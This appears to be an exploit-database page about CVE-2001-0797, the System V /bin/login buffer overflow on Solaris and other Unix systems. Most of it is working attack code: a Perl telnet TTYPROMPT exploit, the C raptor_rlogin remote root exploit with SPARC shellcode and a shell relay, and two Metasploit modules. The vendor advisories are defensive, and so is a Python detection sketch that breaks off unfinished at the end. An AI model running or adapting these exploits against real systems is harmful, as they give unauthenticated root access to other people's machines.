#  -> some asked 'why code another one?' 
#  I'm bored.. I guess.... been using other ppl's tools... it's time 
#  to write my own.. so that I have a reason to feel proud too... 
#  
#  -> again, some asked 'why not in C?'
#  ok... I'm lame.. my C sucks... my Perl sucks too...
#  I'm not a professional programmer anyway... =p
#
#  As usual, any comments or flames, go to jinyean at hotmail.com
#
use Socket;
use FileHandle;

if ($ARGV[0] eq '') {
	print "Usage: $0 <host>\n";
	exit;
}

$payload="\xff\xfc\x18"		# Won't terminal type
	."\xff\xfc\x1f"		# Won't negotiate window size
	."\xff\xfc\x21"		# Won't remote flow control
	."\xff\xfc\x23"		# Won't	X display location
	."\xff\xfb\x22"		# Will linemode	
	."\xff\xfc\x24"		# Won't environment option
	."\xff\xfb\x27"		# Will new environment option	
	."\xff\xfb\x00"		# Will binary transmission
	."\xff\xfa\x27\x00"	# My new environ option
	."\x00\x54\x54\x59\x50\x52\x4f\x4d\x50\x54"	# 'TTYPROMPT'
	."\x01\x61\x62\x63\x64\x65\x66"			# 'abcdef', any 6 chars will do
	."\xff\xf0";		# Suboption end
$port=23;
$user="bin";			# You may change this to another user
$addr=getaddr($ARGV[0]);

for ($i=0;$i<65;$i++) {
	$user.=" c";		# Again, any char will do
}

socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n";

print "/bin/login array mismanagement exploit by snooq (jinyean\@hotmail.com)\n";
print "Connected. Wait for a shell....\n";

SOCKET->autoflush();

$pid=fork;

if ($pid) {			# Parent reads	
	send(SOCKET, $payload, 0);
	send(SOCKET, "$user\n", 0);
	read(SOCKET,$buff,69);	# Read the garbage
	while (<SOCKET>) {
		print STDOUT $_;
	}
}
else {				# Child sends
	print SOCKET while (<STDIN>);
	close SOCKET;
}
exit;

sub getaddr {

	my $host=($_[0]);
	my $n=$host;
	$n=~tr/\.//d;

	if ($n=~m/\d+/) {
		return pack('C4',split('\.',$host));
	}
	else {
		return (gethostbyname($host))[4];
	}
}
		

- Vulnerability information (21180)

Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability (EDBID:21180)
Platform: solaris (remote)
Published: 2004-12-04 (Verified)
Author: Marco Ivaldi
source: http://www.securityfocus.com/bid/3681/info

The 'login' program is used in UNIX systems to authenticate users with a username and password. The utility is typically invoked at the console, by 'telnetd', 'rlogind', and if configured to do so, SSH.

Versions of 'login' descended from System V UNIX contain a buffer overflow when handling environment variables. Several operating systems such as Solaris/SunOS, HP-UX, AIX, IRIX, and Unixware contain vulnerable versions of 'login'.

Unauthenticated clients can exploit this issue to execute arbitrary code as root. On systems where 'login' is installed setuid root, local attackers can elevate privileges.

/*
 * $Id: raptor_rlogin.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
 *
 * raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * Buffer overflow in login in various System V based operating systems 
 * allows remote attackers to execute arbitrary commands via a large number 
 * of arguments through services such as telnet and rlogin (CVE-2001-0797).
 *
 * Dedicated to my beautiful croatian ladies (hello Zrinka!) -- August 2004
 *
 * This remote root exploit uses the (old) System V based /bin/login 
 * vulnerability via the rlogin attack vector, returning into the .bss 
 * section to effectively bypass the non-executable stack protection
 * (noexec_user_stack=1 in /etc/system).
 *
 * Many thanks to scut <scut@nb.in-berlin.de> (0dd) for his elite pam_handle_t
 * technique (see 7350logout.c), also thanks to inode <inode@deadlocks.info>.
 *
 * Usage (must be root):
 * # gcc raptor_rlogin.c -o raptor_rlogin -Wall
 * [on solaris: gcc raptor_rlogin.c -o raptor_rlogin -Wall -lxnet]
 * # ./raptor_rlogin -h 192.168.0.50
 * [...]
 * # id;uname -a;uptime;
 * uid=0(root) gid=0(root)
 * SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
 *   7:45pm  up 12 day(s), 18:42,  1 user,  load average: 0.00, 0.00, 0.01
 * #
 *
 * Vulnerable platforms (SPARC):
 * Solaris 2.5.1 without patch 106160-02 [untested]
 * Solaris 2.6 without patch 105665-04 [untested]
 * Solaris 7 without patch 112300-01 [untested]
 * Solaris 8 without patch 111085-02 [tested]
 */

#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>	/* memcpy(), strlen(), strstr(), strerror() */
#include <strings.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define	INFO1	"raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8"
#define	INFO2	"Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define	BUFSIZE	3000			// max size of the evil buffer
#define	RETADDR	0x27184			// retaddr, should be reliable
#define	TIMEOUT	10			// net_read() default timeout
#define	CMD	"id;uname -a;uptime;\n"	// executed upon exploitation

char sc[] = /* Solaris/SPARC special shellcode (courtesy of inode) */
/* execve() + exit() */
"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"
"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4"
"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08";

char sparc_nop[] = /* Solaris/SPARC special nop (xor %sp, %sp, %o0) */
"\x90\x1b\x80\x0e";

/* prototypes */
int	exploit_addchar(unsigned char *ww, unsigned char wc);
void	fatalerr(char *func, char *error, int fd);
int	net_connect(char *host, int port, int timeout);
int	net_read(int fd, char *buf, int size, int timeout);
int	net_resolve(char *host);
int	sc_copy(unsigned char *buf, char *str, long len);
void	set_val(char *buf, int pos, int val);
void	shell(int fd);
void	usage(char *progname);

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf[BUFSIZE], *p = buf;
	char	c, *host = NULL, term[] = "vt100/9600";
	int	fd, i, found, len;
	int	timeout = TIMEOUT, debug = 0;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* parse command line */
	if (argc < 2)
		usage(argv[0]);

	while ((c = getopt(argc, argv, "dh:t:")) != EOF)
		switch(c) {
		case 'h':
			host = optarg;
			break;
		case 't':
			timeout = atoi(optarg);
			break;
		case 'd':
			debug = 1;
			break;
		default:
			usage(argv[0]);
		}

	if (!host)
		usage(argv[0]);

	/* connect to the target host */
	fd = net_connect(host, 513, 10);
	fprintf(stderr, "# connected to remote host: %s\n", host);

	/* signal handling */
	signal(SIGPIPE, SIG_IGN);

	/* begin the rlogin session */
	memset(buf, 0, sizeof(buf));

	if (send(fd, buf, 1, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	if (net_read(fd, buf, sizeof(buf), timeout) < 0)
		fatalerr("error", "Timeout reached in rlogin session", fd);

	/* dummy rlogin authentication */
	memcpy(p, "foo", 3);		// local login name
	p += 4;
	memcpy(p, "bar", 3);		// remote login name
	p += 4;
	memcpy(p, term, sizeof(term));	// terminal type
	p += sizeof(term);

	fprintf(stderr, "# performing dummy rlogin authentication\n");
	if (send(fd, buf, p - buf, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for password prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "assword: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Timeout waiting for password prompt", fd);

	/* send a dummy password */
	if (send(fd, "pass\n", 5, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for login prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	fprintf(stderr, "# waiting for login prompt\n");
	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "ogin: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Timeout waiting for login prompt", fd);

	fprintf(stderr, "# returning into 0x%08x\n", RETADDR);

	/* for debugging purposes */
	if (debug) {
		printf("# debug: press enter to continue");
		scanf("%c", &c);
	}

	/* prepare the evil buffer */
	memset(buf, 0, sizeof(buf));
	p = buf;

	/* login name */
	memcpy(p, "foo ", 4);
	p += 4;

	/* return address (env) */
	set_val(p, 0, RETADDR);
	p += 4;
	memcpy(p, " ", 1);
	p++;

	/* trigger the overflow (env) */
	for (i = 0; i < 60; i++, p += 2)
		memcpy(p, "a ", 2);

	/* padding */
	memcpy(p, " BBB", 4);
	p += 4;

	/* nop sled and shellcode */
	for (i = 0; i < 398; i++, p += 4)
		memcpy(p, sparc_nop, 4);
	p += sc_copy(p, sc, sizeof(sc) - 1);

	/* padding */
	memcpy(p, "BBB ", 4);
	p += 4;

	/* pam_handle_t: minimal header */
	memcpy(p, "CCCCCCCCCCCCCCCC", 16);
	p += 16;
	set_val(p, 0, RETADDR);	// must be a valid address
	p += 4;
	set_val(p, 0, 0x01);
	p += 4;

	/* pam_handle_t: NULL padding */
	for (i = 0; i < 52; i++, p += 4)
		set_val(p, 0, 0x00);

	/* pam_handle_t: pameptr must be the 65th ptr */
	memcpy(p, "\x00\x00\x00 AAAA\n", 9);
	p += 9;

	/* send the evil buffer, 256 chars a time */
	len = p - buf;
	p = buf;
	while (len > 0) {
		fprintf(stderr, "#");
		i = len > 0x100 ? 0x100 : len;
		send(fd, p, i, 0);
		len -= i;
		p += i;
		if (len)
			send(fd, "\x04", 1, 0);
		usleep(500000);
	}
	fprintf(stderr, "\n");
	
	/* wait for password prompt */
	found = 0;
	memset(buf, 0, sizeof(buf));

	fprintf(stderr, "# evil buffer sent, waiting for password prompt\n");
	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "assword: ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Most likely not vulnerable", fd);

	fprintf(stderr, "# password prompt received, waiting for shell\n");

	if (send(fd, "pass\n", 5, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for shell prompt */
	memset(buf, 0, sizeof(buf));
	found = 0;

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "# ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Most likely not vulnerable", fd);

	/* connect to the remote shell */
	fprintf(stderr, "# shell prompt detected, successful exploitation\n\n");
	shell(fd);

	exit(0);
}

/*
 * exploit_addchar(): char translation for pam (ripped from scut)
 */
int exploit_addchar(unsigned char *ww, unsigned char wc)
{
	unsigned char * wwo = ww;

	switch (wc) {
	case ('\\'):
		*ww++ = '\\';
		*ww++ = '\\';
		break;
	case (0xff):
	case ('\n'):
	case (' '):
	case ('\t'):
		*ww++ = '\\';
		*ww++ = ((wc & 0300) >> 6) + '0';
		*ww++ = ((wc & 0070) >> 3) + '0';
		*ww++ = (wc & 0007) + '0';
		break;
	default:
		*ww++ = wc;
		break;
	}

	return (ww - wwo);
}

/*
 * fatalerr(): error handling routine
 */
void fatalerr(char *func, char *error, int fd)
{
	fprintf(stderr, "%s: %s\n", func, error);
	close(fd);
	exit(1);
}

/*
 * net_connect(): simple network connect with timeout
 */
int net_connect(char *host, int port, int timeout)
{
	int			fd, i, flags;
	socklen_t		sock_len;	/* getpeername() expects a socklen_t */
	struct sockaddr_in	sin;
	struct timeval		tv;
	fd_set			fds;

	/* allocate a socket */
	if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		perror("socket");
		exit(1);
	}

	/* bind a privileged port (FIXME) */
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = htonl(INADDR_ANY);
	for (i = 1023; i > 0; i--) {
		sin.sin_port = htons(i);
		if (!(bind(fd, (struct sockaddr *)&sin, sizeof(sin))))
			break;
	}
	if (i == 0)
		fatalerr("error", "Can't bind a privileged port (must be root)", fd);

	/* resolve the peer address */
	sin.sin_port = htons(port);
	if (!(sin.sin_addr.s_addr = net_resolve(host)))
		fatalerr("error", "Can't resolve hostname", fd);

	/* set non-blocking */
	if ((flags = fcntl(fd, F_GETFL, 0)) < 0)
		fatalerr("fcntl", strerror(errno), fd);
	if (fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0)
		fatalerr("fcntl", strerror(errno), fd);

	/* connect to remote host */
	if (!(connect(fd, (struct sockaddr *)&sin, sizeof(sin)))) {
		if (fcntl(fd, F_SETFL, flags) < 0)
			fatalerr("fcntl", strerror(errno), fd);
		return(fd);
	}
	if (errno != EINPROGRESS)
		fatalerr("error", "Can't connect to remote host", fd);

	/* set timeout */
	tv.tv_sec = timeout;
	tv.tv_usec = 0;

	/* setup select structs */
	FD_ZERO(&fds);
	FD_SET(fd, &fds);

	/* select */
	if (select(FD_SETSIZE, NULL, &fds, NULL, &tv) <= 0)
		fatalerr("error", "Can't connect to remote host", fd);
	
	/* check if connected */
	sock_len = sizeof(sin);
	if (getpeername(fd, (struct sockaddr *)&sin, &sock_len) < 0)
		fatalerr("error", "Can't connect to remote host", fd);
	if (fcntl(fd, F_SETFL, flags) < 0)
		fatalerr("fcntl", strerror(errno), fd);
	return(fd);
}

/*
 * net_read(): non-blocking read from fd
 */
int net_read(int fd, char *buf, int size, int timeout)
{
	fd_set		fds;
	struct timeval	wait;
	int		n = -1;

	/* set timeout */
	wait.tv_sec = timeout;
	wait.tv_usec = 0;

	memset(buf, 0, size);

	FD_ZERO(&fds);
	FD_SET(fd, &fds);

	/* select with timeout */
	if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) {
		perror("select");
		exit(1);
	}

	/* read data if any */
	if (FD_ISSET(fd, &fds))
		n = read(fd, buf, size);

	return n;
}

/*
 * net_resolve(): simple network resolver
 */
int net_resolve(char *host)
{
	struct in_addr	addr;
	struct hostent	*he;

	memset(&addr, 0, sizeof(addr));

	if ((addr.s_addr = inet_addr(host)) == INADDR_NONE) {
		if (!(he = (struct hostent *)gethostbyname(host)))
			return(0);
		memcpy((char *)&addr.s_addr, he->h_addr, he->h_length);
	}
	return(addr.s_addr);
}

/*
 * sc_copy(): copy the shellcode, using exploit_addchar()
 */
int sc_copy(unsigned char *buf, char *str, long len)
{
	unsigned char	*or = buf;
	int 		i;

	for(i = 0; i < len; i++)
		buf += exploit_addchar(buf, str[i]);

	return(buf - or);
}

/*
 * set_val(): copy a dword inside a buffer
 */
void set_val(char *buf, int pos, int val)
{
	buf[pos] =	(val & 0xff000000) >> 24;
	buf[pos + 1] =	(val & 0x00ff0000) >> 16;
	buf[pos + 2] =	(val & 0x0000ff00) >> 8;
	buf[pos + 3] =	(val & 0x000000ff);
}

/*
 * shell(): semi-interactive shell hack
 */
void shell(int fd)
{
	fd_set	fds;
	char	tmp[128];
	int	n;

	/* quote Hvar 2004 */
	fprintf(stderr, "\"Da Bog da ti se mamica nahitavala s vragom po dvoristu!\" -- Bozica (Hrvatska)\n\n");

	/* execute auto commands */
	write(1, "# ", 2);
	write(fd, CMD, strlen(CMD));

	/* semi-interactive shell */
	for (;;) {
		FD_ZERO(&fds);
		FD_SET(fd, &fds);
		FD_SET(0, &fds);

		if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
			perror("select");
			break;
		}

		/* read from fd and write to stdout */
		if (FD_ISSET(fd, &fds)) {
			if ((n = read(fd, tmp, sizeof(tmp))) <= 0) {
				/* 0 means EOF: the remote shell is gone */
				fprintf(stderr, "Goodbye...\n");
				break;
			}
			if (write(1, tmp, n) < 0) {
				perror("write");
				break;
			}
		}

		/* read from stdin and write to fd */
		if (FD_ISSET(0, &fds)) {
			if ((n = read(0, tmp, sizeof(tmp))) <= 0) {
				if (n < 0)
					perror("read");
				break;	/* EOF on stdin: end the session */
			}
			if (write(fd, tmp, n) < 0) {
				perror("write");
				break;
			}
		}
	}

	close(fd);
	exit(1);
}

void usage(char *progname)
{
	fprintf(stderr, "usage: %s [-h host] [-t timeout] [-d]\n\n", progname);
	fprintf(stderr, "-h host\t\tdestination ip or fqdn\n");
	fprintf(stderr, "-t timeout\tnet_read() timeout (default: %d)\n", TIMEOUT);
	fprintf(stderr, "-d\t\tturn on debug mode\n\n");
	exit(1);
}
		

- Vulnerability Information (F82329)

Solaris in.telnetd TTYPROMPT Buffer Overflow (PacketStormID:F82329)
2009-10-28 00:00:00
MC,cazz  
exploit,overflow
solaris
CVE-2001-0797

This Metasploit module uses a buffer overflow in the Solaris 'login' application to bypass authentication in the telnet daemon.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
			'Description'    => %q{
				This module uses a buffer overflow in the Solaris 'login'
			application to bypass authentication in the telnet daemon. 
			},
			'Author'         => [ 'MC', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2001-0797'],
					[ 'OSVDB', '690'],
					[ 'BID', '5531'],

				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 2000,
					'BadChars' => '',
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        => 
				[
					['Automatic', { }],
				],
			'DisclosureDate' => 'Jan 18 2002',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(23),
					OptString.new('USER', [ true, "The username to use",     "bin" ]),
				], self.class)
	end

	def exploit
		connect
	
		banner = sock.get_once
		
		print_status('Setting TTYPROMPT...')
		
		req = 
			"\xff\xfc\x18" +
			"\xff\xfc\x1f" +
			"\xff\xfc\x21" +
			"\xff\xfc\x23" +
			"\xff\xfb\x22" +
			"\xff\xfc\x24" +
			"\xff\xfb\x27" +
			"\xff\xfb\x00" +
			"\xff\xfa\x27\x00" +
			"\x00TTYPROMPT" +
			"\x01" + 
			rand_text_alphanumeric(6) + 
			"\xff\xf0"	
		
		sock.put(req)
		sleep(0.25)
		
		print_status('Sending username...')
	
		filler = rand_text_alpha(rand(10) + 1)
 
		req << datastore['USER'] + (" #{filler}" * 65) 
		
		sock.put(req + "\n\n\n")

		sleep(0.25)
		sock.get_once
		
		sock.put(payload.encoded + "\n")

		sleep(0.25)
		
		handler
	end

end


- Vulnerability Information (F82226)

System V Derived /bin/login Extraneous Arguments Buffer Overflow (PacketStormID:F82226)
2009-10-27 00:00:00
I)ruid  
exploit,overflow
CVE-2001-0797

This exploit connects to a system's modem over dialup and exploits a buffer overflow vulnerability in its System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Dialup

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
			'Description'	=> %q{
				This exploit connects to a system's modem over dialup and exploits
				a buffer overflow vulnerability in its System V derived /bin/login.
				The vulnerability is triggered by providing a large number of arguments.
			},
			'References'	=>
				[
					[ 'CVE', '2001-0797'],
					[ 'OSVDB', '690'],
					[ 'OSVDB', '691'],
					[ 'BID', '3681'],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
				],
			'Version'	=> '$Revision: 6479 $',
			'Author'	=>
				[
					'I)ruid',
				],
			'Arch'		=> ARCH_TTY,
			'Platform'	=> ['unix'],
			'License'	=> MSF_LICENSE,
			'Payload'	=>
				{
					'Space'       => 3000,
					'BadChars'    => '',
					'DisableNops' => true,
				},
			'Targets'	=>
				[
					['Solaris 2.6 - 8 (SPARC)', {
						'Platform' => 'unix',
						'Ret'      => 0x00027184,
						# Solaris/SPARC special shellcode (courtesy of inode)
						# execve() + exit()
						'Shellcode' =>
							"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
							"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
							"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
							"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
						'NOP' => "\x90\x1b\x80\x0e",
					} ],
				],
			'DefaultTarget' => 0
		))

		register_options(
			[
#				OptString.new('USER', [true, 'User to log in as', 'bin']),
			], self.class
		)

		deregister_options(
		)
	end

	def buildbuf
		print_status("Targeting: #{self.target.name}")

		retaddr   = self.target.ret
		shellcode = self.target['Shellcode']
		nop       = self.target['NOP']

		user      = datastore['USER']
		command   = datastore['COMMAND'] + "\n"

		# prepare the evil buffer
		i = 0
		buf = ''

		# login name
		buf[i,4] = 'bin '
		i += 4

		# return address
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,1] = ' '
		i += 1

		# trigger the overflow
		(0...60).each {|c|
			buf[i,2] = 'a '
			i += 2
		}

		# padding
		buf[i,4] = ' BBB'
		i += 4

		# nop sled and shellcode
		(0...398).each {|c|
			buf[i,nop.size] = nop
			i += nop.size
		}
		shellcode.each_byte {|b|
			case b
			when 0x5c
				# a backslash must itself be escaped for login's argument parser
				buf[i,2] = "\\\\"
				i += 2
			when 0xff, 0x0a, 0x20, 0x09
				# bytes that would end the line or split an argument go out
				# as a backslash-octal escape, e.g. 0x20 -> "\040"
				buf[i,1] = "\\"
				buf[i+1,1] = (((b & 0300) >> 6) + 0x30).chr
				buf[i+2,1] = (((b & 0070) >> 3) + 0x30).chr
				buf[i+3,1] = ( (b & 0007)       + 0x30).chr
				i += 4
			else
				buf[i,1] = b.chr
				i += 1
			end
		}
		# TODO: need to overwrite/skip the last byte of shellcode?
		#i -= 1

		# padding
		buf[i,4] = 'BBB '
		i += 4

		# pam_handle_t: minimal header
		buf[i,16] = 'CCCCCCCCCCCCCCCC'
		i += 16
		buf[i,4] = [retaddr].pack('N')
		i += 4
		buf[i,4] = [0x01].pack('N')
		i += 4

		# pam_handle_t: NULL padding
		(0...52).each {|c|
			buf[i,4] = [0].pack('N')
			i += 4
		}

		# pam_handle_t: pameptr must be the 65th ptr
		buf[i,9] = "\x00\x00\x00 AAAA\n"
		i += 9

		return buf
	end

	def exploit
		buf = buildbuf

		print_status("Dialing Target")
		if not connect_dialup
			print_error("Exiting.")
			return
		end

		print_status("Waiting for login prompt")

		res = dialup_expect(/ogin:\s/i, 10)
		#puts Rex::Text.to_hex_dump(res[:buffer]) 
		if not res[:match]
			print_error("Login prompt not found... Exiting.")
			disconnect_dialup
			return
		end

		# send the evil buffer, 256 chars at a time
		print_status("Sending evil buffer...")
		#puts Rex::Text.to_hex_dump(buf)
		len = buf.length
		p = 0
		while(len > 0) do
			i = len > 0x100 ? 0x100 : len
			#puts Rex::Text.to_hex_dump(buf[p,i])
			dialup_puts(buf[p,i])
			len -= i
			p += i
#			if len > 0
#				puts Rex::Text.to_hex_dump("\x04")
#				dialup_puts("\x04") if len > 0
#			end
			sleep 0.5
		end

		# wait for password prompt
		print_status("Waiting for password prompt")
		res = dialup_expect(/assword:/i, 30)
		#puts Rex::Text.to_hex_dump(res[:buffer]) 
		if not res[:match] 
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end	

		print_status("Password prompt received, waiting for shell")
		dialup_puts("pass\n")

		res = dialup_expect(/#\s/i, 20)
		#puts Rex::Text.to_hex_dump(res[:buffer]) 
		if not res[:match]
			print_error("Shell not found.")
			print_error("Target is likely not vulnerable... Exiting.")
			disconnect_dialup
			return
		end

		print_status("Success!!!")
		handler

		disconnect_dialup
	end

end


- Vulnerability Information (F35500)

raptor_rlogin.c (PacketStormID:F35500)
2004-12-31 00:00:00
Marco Ivaldi  0xdeadbeef.info
exploit,remote,root
solaris
CVE-2001-0797

Remote root exploit for rlogin on Solaris/SPARC 2.5.1/2.6/7/8. This remote root exploit uses the (old) System V based /bin/login vulnerability via the rlogin attack vector, returning into the .bss section to effectively bypass the non-executable stack protection (noexec_user_stack=1 in /etc/system).

- Vulnerability Information (OSVDB 690)

OSVDB ID: 690
Title: Unix SysV Telnet login Environment Remote Overflow
Location: Remote / Network Access
Attack Type: Input Manipulation
Impact: Loss of Integrity
Solution: Patch / RCS
Exploit: Exploit Public, Exploit Commercial
Disclosure: Third-party Verified

- Vulnerability Description

A buffer overflow exists in multiple System V-based operating systems. The login application fails to validate data received via telnet, resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution, resulting in a loss of integrity.

- Timeline

2001-12-12 Unknown
2004-12-22 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, many vendors have released a patch to address this vulnerability.

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information (BID 3681)

Title: Multiple Vendor System V Derived 'login' Buffer Overflow Vulnerability
Class: Boundary Condition Error
BID: 3681
Remote: Yes
Local: No
Published: 2001-12-12 12:00:00
Updated: 2007-11-15 12:39:00
Credit: Discovered by Mark Dowd of ISS X-Force.

- Affected Program Versions

Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Solaris 2.4_x86
Sun Solaris 2.4
Sun Solaris 2.3
Sun Solaris 2.2
Sun Solaris 2.1
Sun Solaris 2.0
SGI IRIX 3.3.3
SGI IRIX 3.3.2
SGI IRIX 3.3.1
SGI IRIX 3.3
SGI IRIX 3.2
SCO Open Server 5.0.6 a
SCO Open Server 5.0.6
SCO Open Server 5.0.5
SCO Open Server 5.0.4
SCO Open Server 5.0.3
SCO Open Server 5.0.2
SCO Open Server 5.0.1
SCO Open Server 5.0
IBM AIX 4.3.3
IBM AIX 4.3.2
IBM AIX 4.3.1
IBM AIX 4.3
IBM AIX 5.1
HP HP-UX (VVOS) 11.0.4
HP HP-UX (VVOS) 10.24
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
HP HP-UX 10.01
HP HP-UX 10.0
Cisco Voice Services Provisioning Tool
+ Sun Solaris 2.6
Cisco Signaling Controller 2200
+ Sun Solaris 2.5.1
+ Sun Solaris 2.6
Cisco Secure IDS Network Sensor 3.0 (2)S6
Cisco Secure IDS Network Sensor 3.0
Cisco PGW2200 PSTN Gateway
+ Sun Solaris 2.6
Cisco Billing and Management Server
+ Sun Solaris 2.6
Cisco Secure IDS Network Sensor 3.0 (5)

- Unaffected Program Versions

Cisco Secure IDS Network Sensor 3.0 (5)

- Vulnerability Discussion

The 'login' program is used in UNIX systems to authenticate users with a username and password. The utility is typically invoked at the console, by 'telnetd', 'rlogind', and if configured to do so, SSH.

Versions of 'login' descended from System V UNIX contain a buffer overflow when handling environment variables. Several operating systems such as Solaris/SunOS, HP-UX, AIX, IRIX, and Unixware contain vulnerable versions of 'login'.

Unauthenticated clients can exploit this issue to execute arbitrary code as root. On systems where 'login' is installed setuid root, local attackers can elevate privileges.

- Exploitation

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A publicly available exploit has been written for Solaris i386 systems. An unpublished exploit for Solaris/SPARC systems is in circulation in the underground.

This issue is also exploitable by setting the TTYPROMPT environment variable to contain six bytes of data and then passing a string containing 65 " c" character combinations, followed by a newline, to a telnet service accessing the vulnerable login.

A newer exploit has been made available.
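The telnet trigger described above (a client-supplied TTYPROMPT pushed through NEW-ENVIRON, then a login line padded with 65 extra arguments) and the oversized argument list the dialup module builds, as an added detection example; this is not code from the page or from any of the exploits listed on it. It decodes the client side of a telnet session per RFC 854/1572, records the environment variables the client offers, and counts the arguments on the first line login would read. The 64-argument threshold, the space/tab tokenizing, and the sample streams (which mirror the negotiation bytes sent by the Metasploit telnet module) are assumptions made for the example.

```python
import re

# Telnet command bytes (RFC 854) and the NEW-ENVIRON option (RFC 1572).
IAC, DONT, DO, WONT, WILL, SB, SE = 0xFF, 0xFE, 0xFD, 0xFC, 0xFB, 0xFA, 0xF0
NEW_ENVIRON = 0x27
ENV_IS, ENV_SEND, ENV_INFO = 0, 1, 2              # subnegotiation commands
ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR = 0, 1, 2, 3

# Assumption: the public trigger sends 65 tokens after the username, so a
# login line carrying more than 64 arguments is reported as the overflow.
MAX_LOGIN_ARGS = 64


def new_environ_is(name: bytes, value: bytes) -> bytes:
    """IAC SB NEW-ENVIRON IS VAR <name> VALUE <value> IAC SE: the framing the
    telnet module above uses to push TTYPROMPT into login's environment."""
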